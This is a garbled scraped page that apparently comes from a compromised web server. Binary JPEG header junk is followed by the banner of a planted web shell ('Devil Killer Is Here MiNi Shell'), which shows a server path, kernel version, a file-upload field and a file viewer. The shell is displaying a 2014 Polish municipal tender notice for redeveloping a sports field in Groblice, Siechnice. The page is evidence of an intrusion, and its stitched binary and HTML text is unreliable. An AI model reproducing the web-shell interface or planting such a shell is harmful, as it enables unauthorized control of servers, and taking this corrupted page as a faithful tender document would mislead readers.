JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140731/256796-N-2014.html

<p class="kh_header"><b>Siechnice: Wykonanie prac budowlanych na podstawie sporządzonej dokumentacji projektowej pn. Remont i modernizacja boiska do piłki nożnej w Groblicach, Gmina Siechnice - Etap II</b><br>
<b>Numer ogłoszenia: 256796 - 2014; data zamieszczenia: 31.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Siechnic , ul. Jana Pawła II 12, 55-011 Siechnice, woj. dolnośląskie, tel. 71 391 91 01, faks 71 786 09 07.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siechnice.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie prac budowlanych na podstawie sporządzonej dokumentacji projektowej pn. Remont i modernizacja boiska do piłki nożnej w Groblicach, Gmina Siechnice - Etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zakres przedstawiony w projekcie i STWIOR,  stanowiących załączniki nr 14  i 15 do SIWZ.

Przedmiot zamówienia obejmuje w szczególności następujące prace: 
1)wykonanie nowych placów i ścieżek o nawierzchni żwirowo-piaszczystej, 
2)nowe nasadzenia zieleni ozdobnej: wysokiej i niskiej, 
3)montaż elementów siłowni zewnętrznej: przeplotni, równoważni na sprężynach, zewnętrznej ławki gimnastycznej, drążka potrójnego oraz belki z uchwytami. 
4)przeniesienie istniejącego betonowego stołu do tenisa stołowego w pobliże istniejącego boiska do koszykówki. 
5)wyposażenie placów i ścieżek w ławki, kosze na śmieci, trejaż i pergole drewniane. 
6)podwyższenie i poszerzenie oraz zmiana spadków stoków na łagodniejsze istniejącej górki saneczkowej. 

Na terenie  przewiduje się :
1)Zieleń - nowe nasadzenia krzewów i drzew ozdobnych,  rys. A1 - PZT - projektu Remont i modernizacja boiska do piłki nożnej w Groblicach, Gmina Siechnice- Etap II, w szczególności:
a)drzewa: 
-klon kulisty - 4 szt. wysokość 2,2m, obwód pnia na wys. 1,0m: 12-14cm, 
-lipa- 4 szt., - wysokość 2,5-3,5m, obwód pnia na wys. 1,0m: 12-14cm,
b)krzewy:
-ogniki, berberys zimnozielony, ostrodrzew kolczasty - łącznie 377 szt., wysokość 0,2-0,3m, hodowane w skrzynkach 3l,
-winobluszcz - 21 szt.
c)Koszenie trawy na pozostałym terenie.

2)Elementy siłowni zewnętrznej - rys. A2-Siłownia zewnętrzna - oraz karty katalogowe w projekcie Remont i modernizacja boiska do piłki nożnej w Groblicach, Gmina Siechnice - Etap II, w  szczególności: 
a)przeplotnia - 1szt.,
b)równoważnia na sprężynach - 1 szt.,
c)ławka gimnastyczna zewnętrzna - 1 szt.,
d)drążek potrójny - 1 szt.,
e)belka z uchwytami - 1 szt.,

3)Elementy małej architektury: rys. A1- PZT + karty katalogowe, rys. A3-Pergola i tenis stołowy + karty katalogowe, rys. A5-Altana+karta katalogowa, w projekcie Remont i modernizacja boiska do piłki nożnej w Groblicach, Gmina Siechnice - Etap II, w szczególności:
a)trejaż drewniany - 1 kpl.
b)pergola - 1 kpl.
c)altana (pow. do 25 m2) - 1 szt. 
d)ławki bez oparć - 10 szt.
e)ławki z oparciami - 15 szt.
f)kosze na śmieci - 5 szt.

Uwagi:
a)montaż elementów wg technologii producenta i deklaracji zgodności
b)konstrukcje drewniane (trejaż, pergola, altana) należy wykonać z gotowych elementów wg projektów  wykonawczych producenta i instrukcji montażu.
     
4)Modernizacja górki saneczkowej - podwyższenie o ok. 70-80 cm, poszerzenie o 150 cm, zmiana spadków stoków na łagodniejsze - rys. A4-Górka saneczkowa- w projekcie Remont i modernizacja boiska do piłki nożnej w Groblicach, Gmina Siechnice - Etap II 

5)Ścieżki i place - wg rys A1 - PZT- projektu Remont i modernizacja boiska do piłki nożnej w Groblicach, Gmina Siechnice - Etap II - o nawierzchni żwirowo-piaszczystej z glinką (1:1:1) o gr. 20 cm. Nawierzchnie żwirowe należy układać ze spadkiem poprzecznym 3%, obrzeża betonowe.
a)plac nr 1 - pod altankę o wym. 8,0x11,5m,
b)plac nr 2 - pod stół do tenisa stołowego o wym. 6,5x9,0m,
c)plac nr 3 - przy boisku do koszykówki, o wym.7,0x10,0m
d)plac nr 4 - pod trejaż o wym. 7,0x8,0m
e)ścieżki o szer.150 cm, długość ok. 240 m.

6)Ukształtowanie terenu: na terenie objętym projektem oraz, dodatkowo, na pozostałym terenie działki (oprócz wykonanych boisk: do piłki nożnej i koszykówki) przewiduje się prace mikroniwelacyjne, które mają na celu wyrównanie terenu. Dopuszczalne odchyłki 3 cm pod łatą trzymetrową.

7)Bilans terenu: 
a)powierzchnia działki - 12 270 m2
b)powierzchnia terenu objętego projektem -  ok. 4 690 m2
c)dodatkowa powierzchnia objęta niwelacją terenu -  ok. 7 580 m2

Zamawiający nie dopuszcza składania ofert częściowych. Oferty nie zawierające pełnego zakresu przedmiotu zamówienia zostaną odrzucone.

Każdy wykonawca ma prawo zapoznać się z zakresem prac w terenie, zgodnie ze SIWZ wraz z załącznikami. Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej miejsca realizacji zamówienia, zapoznał się z warunkami lokalno-terenowymi planowanych robot budowlanych, aby uzyskać informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej poniesie Wykonawca. 

Przedmiot zamówienia obejmuje wszystkie prace wchodzące w zakres realizacji robót budowlanych.

Przedmiot zamówienia obejmuje zakres przedstawiony w następujących dokumentach podanych kolejno w hierarchii ich ważności:
1)Specyfikacja Istotnych Warunków Zamówienia wraz z załącznikami,
2)dokumentacja projektowa opracowana przez arch. Jana Żuczkowskiego, stanowiąca załącznik nr 14 do specyfikacji istotnych warunków zamówienia,
3)specyfikacja techniczna wykonania i odbioru robót, stanowiąca załącznik nr 15 do specyfikacji istotnych warunków zamówienia.

Dokumentacja projektowa w wersji papierowej dostępna jest do wglądu w Urzędzie Miejskim w Siechnicach pok.204, II piętro w godz. 8.00 - 14.00. Istnieje możliwość zamówienia kopii dokumentacji projektowej (w ciągu 7 dni od złożenia zamówienia) lub możliwość udostępnienia dokumentacji w celu wykonania kopii we własnym zakresie. 

Tam, gdzie w SIWZ i dołączonych do niej załącznikach (np. rysunki, specyfikacje techniczne wykonania i odbioru robót budowlanych, projekty, przedmiary) zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca itp.) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 30 ust. 1 - 3 ustawy Pzp, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach.

Przedmiot zamówienie musi zostać wykonany zgodnie z dokumentacja projektową i zasadami wiedzy technicznej, a Wykonawca zobowiązany jest do wykonania wszelkich prac niezbędnych do osiągnięcia zakładanego rezultatu, tj. wybudowania obiektu budowlanego będącego przedmiotem zamówienia.

Wykonawca zobowiązany będzie wykonać przedmiot zamówienia:
a)z materiałów własnych tj. wyrobów dopuszczonych do stosowania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2010 r. Nr 243 poz. 1623 z późn. zm.) oraz ustawy z dnia 16 kwiecień 2004 r. o wyrobach budowlanych (Dz. U. Nr 92 poz. 881 z późn. zm.);
b)zgodnie z postanowieniami niniejszej SIWZ, zapisami złożonej oferty, dokumentacją i wymaganiami wynikającymi z obowiązujących przepisów prawa, standardów i norm oraz etyką zawodową i ustalonymi zwyczajami, siłami własnymi lub w systemie generalnego wykonawstwa..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art. 67 ust. 1 pkt. 6 Prawo zamówień publicznych przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu nie jest obowiązany wnieść wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisane oświadczenia o spełnieniu warunków w niniejszym postępowaniu zgodnie z wzorem zamieszczonym w załączniku nr 2 do specyfikacji istotnych warunków zamówienia - Oświadczenie o spełnieniu warunków udziału w postępowaniu.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie  musi  być złożone przez każdego wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Warunek zostanie spełniony jeżeli wykonawca wraz z ofertą złoży podpisany wykaz wykonanych w okresie pięciu lat przed upływem terminu składania ofert - a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych. W wykazie wykonawca zobowiązany jest do podania rodzaju, wartości, dat i miejsca wykonania wykazanych robót budowlanych oraz załączy dowody dotyczące najważniejszych robót, określających, czy te roboty zostały wykonane w sposób należyty, a także wskazujące, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wzór wykazu stanowi  załącznik nr 6 do  specyfikacji istotnych warunków zamówienia (Wykaz wykonanych/wykonywanych w ciągu ostatnich pięciu lat robót budowlanych). Dowodami, o których mowa powyżej są:
1)poświadczenie lub
2)jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać stosownego poświadczenia, oświadczenie wykonawcy. 
W przypadku, gdy Zamawiający jest podmiotem na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w punkcie 1) i 2).
Wykonawca zobowiązany jest do wskazania w ww. wykazie usługi niewykonanych lub wykonanych nienależycie.
2.W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane informacje mogą być złożone wspólnie lub oddzielnie przez wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca:
1)wykaże, że dysponuje lub będzie dysponować w okresie przewidzianym na realizację zamówienia sprzętem niezbędnym do realizacji zadania, tj.:
a)Koparko-ładowarka - 1 sztuka,
b)płyta wibracyjna - 1 sztuka,
c)samochód samowyładowczy - 1 sztuka,
2)wraz z ofertą złoży podpisany wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie dysponowania tymi zasobami, opracowany zgodnie z załączonym wzorem stanowiącym załącznik nr 8 do specyfikacji istotnych warunków zamówienia - Wykaz urządzeń technicznych dostępnych wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Warunek zostanie spełniony jeżeli wykonawca:
1)wykaże, że dysponuje lub będzie dysponować w okresie przewidzianym na realizację zamówienia osobami, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami, 
2)wraz z ofertą złoży podpisany wykaz osób, które będą uczestniczyć w realizacji  zamówienia, zawierający informację na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia zgodnie z wymaganiami określonymi w pkt. 1, opracowany zgodnie z załączonym wzorem stanowiącym załącznik nr 7 do specyfikacji istotnych warunków zamówienia - Wykaz personelu odpowiedzialnego bezpośrednio za realizację zamówienia. W wykazie wykonawca zobowiązany jest wskazać, że dysponuje lub będzie dysponował w okresie przewidzianym na realizację zamówienia osobą posiadającą kwalifikacje zawodowe w branży budowlanej lub drogowej do pełnienia funkcji minimum majstra,  
3) do oferty dołączy:
a)informację o podstawie do dysponowania osobą lub osobami, o których mowa w pkt. 1) i 2), 
b)zobowiązanie osoby lub osób z uprawnieniami, że będą uczestniczyć w wykonywaniu zamówienia, jeżeli osoby te nie stanowią zasobu własnego wykonawcy. 
c)oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek ich posiadania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W celu zweryfikowania rzetelności, kwalifikacji, efektywności i doświadczenia Wykonawca zobowiązany jest w wykazie, o którym mowa powyżej, wskazać roboty budowlane, wykonane w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadające w swoim zakresie robotom budowlanym stanowiącym przedmiot zamówienia (w zakresie technologii wykonania obiektu będącego przedmiotem zamówienia), wraz z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te roboty budowlane zostały wykonane należycie oraz wskazujące, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone tj.: co najmniej 2 zadań, polegających na wykonaniu robót budowlanych w zakresie zagospodarowania terenu, małej architektury, niwelacji i utwardzenia terenu, itp.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Wypełnionego druku oferty - zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ - wzór oferty. Cena zawarta w ofercie musi uwzględniać wszystkie prace wynikające z niniejszej specyfikacji istotnych warunków zamówienia, dokumentacji technicznej jak i z zalecanej wizji w terenie.
Oświadczenie, że zastosowane przez Wykonawcę przy realizacji zadania materiały będą  posiadały  właściwości użytkowe wymagane przy tego typu robotach, a także będą posiadały ważne atesty, aprobaty techniczne i deklaracje zgodności dopuszczające do stosowania, które na każde żądanie Zamawiającego zostaną niezwłocznie dostarczone - załącznik nr 4 do specyfikacji istotnych warunków zamówienia
2)oświadczenie o zaakceptowaniu stawek i narzutów do negocjacji wyceny robót dodatkowych i/lub uzupełniających i/lub zaniechanych - załącznik nr 13 do specyfikacji istotnych warunków zamówienia.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane oświadczenie  musi być złożone przez każdego wykonawcę w zakresie w jakim jego dotyczy.
3)pełnomocnictwo dla podmiotów występujących wspólnie (konsorcjum, spółka cywilna), jeżeli zaistnieje taka sytuacja, zgodnie z art. 23  ustawy Prawo zamówień publicznych. W razie wyboru oferty podmiotów występujących wspólnie, Zamawiający zażąda przed zawarciem umowy - stosownie do art. 23 ust. 4 - umowy regulującej współpracę tych podmiotów. Oferta konsorcjum musi spełniać następujące wymagania - zawierać odrębne i niezależne dla każdego uczestnika konsorcjum wszystkie dokumenty i oświadczenia wymienione powyżej, podpisana w taki sposób, by zobowiązywała prawnie wszystkie strony -  to znaczy podpisana przez przedstawiciela konsorcjum, którego upoważnienie do złożenia oferty wynika z dołączonego pełnomocnictwa, udzielonego przez upoważnionych przedstawicieli członków konsorcjum
4)pełnomocnictwo dla osoby podpisującej ofertę i inne dokumenty w imieniu wykonawcy, jeżeli jest to osoba nie wykazana w rejestrze
5) Jeśli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym i/lub osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jednocześnie poleganie Wykonawcy na wiedzy i doświadczeniu innych podmiotów nierozerwalnie wiąże się z tym, że podmioty te będą brały udział w realizacji zamówienia, a Wykonawca przedstawi pisemne zobowiązanie tych podmiotów do udziału w realizacji udzielonego zamówienia. Wzory oświadczeń stanowią odpowiednio załączniki nr 9, 10 i 16 do specyfikacji istotnych warunków zamówienia.
6) Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt 5.2, 5.3 i 5.4 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w pkt 6.2 SIWZ oraz w art. 26 ust. 2b ustawy Prawo zamówień publicznych, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, wymaga złożenia w ofercie:
a)pisemne zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w postaci oświadczeń lub innych dokumentów zawierających powyższe zobowiązania (oryginały), 
b)oświadczenia Wykonawcy o charakterze stosunków, jakie będą łączyły Wykonawcę z podmiotami, o których mowa powyżej;
c)oświadczenia Wykonawcy o zakresie i okresie udziału podmiotów, o których mowa powyżej przy wykonywaniu zamówienia;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
